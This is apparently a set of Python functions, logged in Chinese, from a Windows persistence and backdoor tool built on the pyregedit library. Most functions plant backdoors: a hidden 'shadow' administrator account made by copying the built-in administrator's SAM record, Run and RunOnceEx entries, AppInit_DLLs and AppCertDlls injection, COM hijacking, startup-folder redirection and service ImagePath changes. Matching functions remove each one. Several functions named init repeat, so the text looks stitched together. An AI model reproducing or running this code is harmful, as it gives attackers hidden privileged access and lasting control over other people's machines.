def set_account(username,password): create_accout(username,password) #保存账号的类型 account_type = get_account_num(username) root = pyregedit.HKEY_LOCAL_MACHINE path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:] reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): admin_F = get_admin_account_value() V = reg.get_value("V")[0] # ForcePasswordReset = reg.get_value("ForcePasswordReset")[0] # SupplementalCredentials = reg.get_value("SupplementalCredentials")[0] else: logger.error("用户不存在") return delete_accout(username) #恢复注册表 reg.create_value("F",pyregedit.REG_BINARY,admin_F) reg.create_value("V",pyregedit.REG_BINARY,V) # reg.create_value("ForcePasswordReset",pyregedit.REG_BINARY,ForcePasswordReset) # reg.create_value("SupplementalCredentials",pyregedit.REG_BINARY,SupplementalCredentials) path = r"SAM\SAM\Domains\Account\Users\Names\\" + username reg = pyregedit.RegEdit(root, path) reg.create_value("", account_type, "".encode()) logger.info('影子账号创建成功')
def clear_system_startup_folder(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_value('Startup') logger.info('User Shell Folders Startup 清除成功') except: logger.error('User Shell Folders Startup 清除失败') else: logger.error('需要管理员权限!') return path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_value('Startup') logger.info('Shell Folders Startup 清除成功') except: logger.error('Shell Folders Startup 清除失败') else: logger.error('需要管理员权限!') return
def init(): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}" reg = pyregedit.RegEdit(root, path) if reg.check_key(): path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() logger.info('创建了InprocServer32') else: reg.create_key() path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32" reg = pyregedit.RegEdit(root, path) reg.create_key() logger.info('创建了InprocServer32') return reg
def init(): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}" reg = pyregedit.RegEdit(root, path) if reg.check_key(): path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() logger.info('创建了InprocServer32') else: reg.create_key() path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32" reg = pyregedit.RegEdit(root, path) reg.create_key() logger.info('创建了InprocServer32') return reg
def clear_AppCertDlls(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls" reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): reg.delete_current_key() logger.info('清除') else: logger.info('AppCertDlls键不存在')
def get_admin_account_value(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SAM\SAM\Domains\Account\Users\000001F4" reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): F = reg.get_value("F")[0] # V = reg.get_value("V")[0] return F else: return
def clear_account(username): account_type = get_account_num(username) if not account_type : logger.info("未植入影子后门") return root = pyregedit.HKEY_LOCAL_MACHINE path = r"SAM\SAM\Domains\Account\Users\Names\\" + username reg = pyregedit.RegEdit(root, path) try: reg.delete_current_key() except: pass path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:] reg = pyregedit.RegEdit(root, path) try: reg.delete_current_key() except: pass logger.info("影子账号清除成功")
def clear_AppInit_DLLs(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, "") reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x0) logger.info('清除') else: logger.info('需要管理员权限!') return
def get_account_num(username): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SAM\SAM\Domains\Account\Users\Names\\"+username reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): d = reg.get_value("")[1] return d else: #创建键 # key = reg.create_key() pass
def clear_user(): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\Run" reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): try: if reg.delete_value(value_name): logger.info('Run 删除成功') else: logger.error('没有植入Run 后门') except: logger.error('Run 删除失败') else: pass path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" reg = pyregedit.RegEdit(root, path) if reg.delete_value(value_name): logger.info('RunOnce 删除成功') path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('RunServices 删除成功') except: logger.error('RunServices 删除失败') path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('RunServicesOnce 删除成功') except: logger.error('RunServicesOnce 删除失败')
def set_user_startup_folder_shell(startup_path): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() try: reg.create_value('Startup', pyregedit.REG_SZ, startup_path) logger.info('Shell Folders Startup 修改成功') except: logger.error('Shell Folders Startup 修改失败')
def set_system_startup_folder_shell(startup_path): root = pyregedit.HKEY_LOCAL_MACHINE path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: logger.error('需要管理员权限!') return try: reg.create_value('Startup', pyregedit.REG_SZ, startup_path) logger.info('Shell Folders Startup 修改成功') except: logger.error('Shell Folders Startup 修改失败')
def clear_user_startup_folder(): value = r'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.create_value('Startup', pyregedit.REG_SZ, value) logger.info('User Shell Folders Startup 清除成功') except: logger.error('User Shell Folders Startup 清除失败') else: logger.info('User Shell Folders 键值不存在') path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.create_value('Startup', pyregedit.REG_SZ, value) logger.info('Shell Folders Startup 清除成功') except: logger.error('Shell Folders Startup 清除失败') else: logger.info('Shell Folders 键值不存在')
def set_user_runonce(cmd): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败') else: #创建键 logger.error('RunOnce 键不存在') exit(0)
def clear_com_explorer_Hijack(): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_sub_key('InprocServer32') reg.delete_current_key() logger.info('清除成功') except: logger.error('清除失败') else: logger.info('该后门没有植入') return
def set_AppInit_DLLs(cmd): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg = pyregedit.RegEdit(root,path) #判断键是否存在 if reg.check_key(): try: reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, cmd) reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x01) logger.info('插入注册表成功') except: logger.error('插入注册表失败') else: logger.info('需要管理员权限!') return
def set_user_RunServicesOnce(cmd): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() logger.error('创建 RunServicesOnce 键值') try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def set_system_Explorer(cmd): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() logger.error('创建 Explorer\Run 键值') try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def set_system_RunOnceEx_dll(cmd): root = pyregedit.HKEY_LOCAL_MACHINE path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: reg.create_key() logger.error(r'创建 RunOnceEx\0001\Depend 键值') try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def set_AppCertDlls(cmd): root = pyregedit.HKEY_LOCAL_MACHINE path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls" reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): pass else: #创建键 reg.create_key() logger.info('创建AppCertDlls键') try: reg.create_value('Default', pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def set_user_Explorer(cmd): root = pyregedit.HKEY_CURRENT_USER path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" reg = pyregedit.RegEdit(root, path) if reg.check_key(): pass else: try: reg.create_key() logger.info('创建 Explorer\Run 键值') except: logger.error('需要管理员权限') return try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def clear_com_Hijack(): root = pyregedit.HKEY_CURRENT_USER path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_sub_key('InprocServer32') reg.delete_current_key() if os.path.isdir(defaultpath): shutil.rmtree(defaultpath) else: pass logger.info('清除成功') except: logger.error('清除失败') else: logger.info('该后门没有植入') return
def set_system(cmd): root = pyregedit.HKEY_LOCAL_MACHINE path = r"Software\Microsoft\Windows\CurrentVersion\Run" reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): #获取键(可用于其他操作) key = reg.get_key() else: #创建键 logger.error('需要管理员权限!') return try: reg.create_value(value_name, pyregedit.REG_SZ, cmd) logger.info('插入注册表成功') except: logger.error('插入注册表失败')
def set_reg_service(cmd, service): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SYSTEM\CurrentControlSet\Services\\" + service reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): #获取键(可用于其他操作) key = reg.get_key() else: logger.error(service + '服务不存在') return try: # reg.create_value('ErrorControl',pyregedit.REG_DWORD,0x01) # reg.create_value('ObjectName',pyregedit.REG_SZ,'LocalSystem') reg.create_value('Start', pyregedit.REG_DWORD, 0x02) reg.create_value('Type', pyregedit.REG_DWORD, 0x10) reg.create_value('ImagePath', pyregedit.REG_EXPAND_SZ, cmd) logger.info('修改服务成功') except Exception as e: logger.error('修改服务失败: ' + str(e))
def HKLM_init(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg = pyregedit.RegEdit(root, path) return reg
def clear_system(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"Software\Microsoft\Windows\CurrentVersion\Run" reg = pyregedit.RegEdit(root, path) #判断键是否存在 if reg.check_key(): try: if reg.delete_value(value_name): logger.info('Run 删除成功') else: logger.error('没有植入Run 后门') except: logger.error('Run 删除失败') else: logger.error('Run 需要管理员权限!') return path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" reg = pyregedit.RegEdit(root, path) if reg.delete_value(value_name): logger.info('RunOnce 删除成功') path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('RunServices 删除成功') except: logger.error('RunServices 删除失败') path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('RunServicesOnce 删除成功') except: logger.error('RunServicesOnce 删除失败') path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('Explorer\\Run 删除成功') except: logger.error('Explorer\\Run 删除失败') else: logger.error('没有植入HKLM Explorer\\Run 后门') path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: try: reg.delete_sub_key('Depend') logger.info('RunOnceEx\\0001\\Depend 删除成功') except: pass reg.delete_current_key() logger.info('RunOnceEx\\0001 删除成功') except: logger.error('RunOnceEx\\0001 删除失败') else: logger.error('没有植入 RunOnceEx\\0001 后门') root = pyregedit.HKEY_CURRENT_USER path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" reg = pyregedit.RegEdit(root, path) if reg.check_key(): try: reg.delete_current_key() logger.info('Explorer\\Run 删除成功') except: logger.error('Explorer\\Run 删除失败') else: logger.error('没有植入HKCU Explorer\\Run 后门')
def init(): root = pyregedit.HKEY_LOCAL_MACHINE path = r"SOFTWARE\Microsoft\NetSh" reg = pyregedit.RegEdit(root, path) return reg
def init(): root = pyregedit.HKEY_CURRENT_USER path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg = pyregedit.RegEdit(root, path) return reg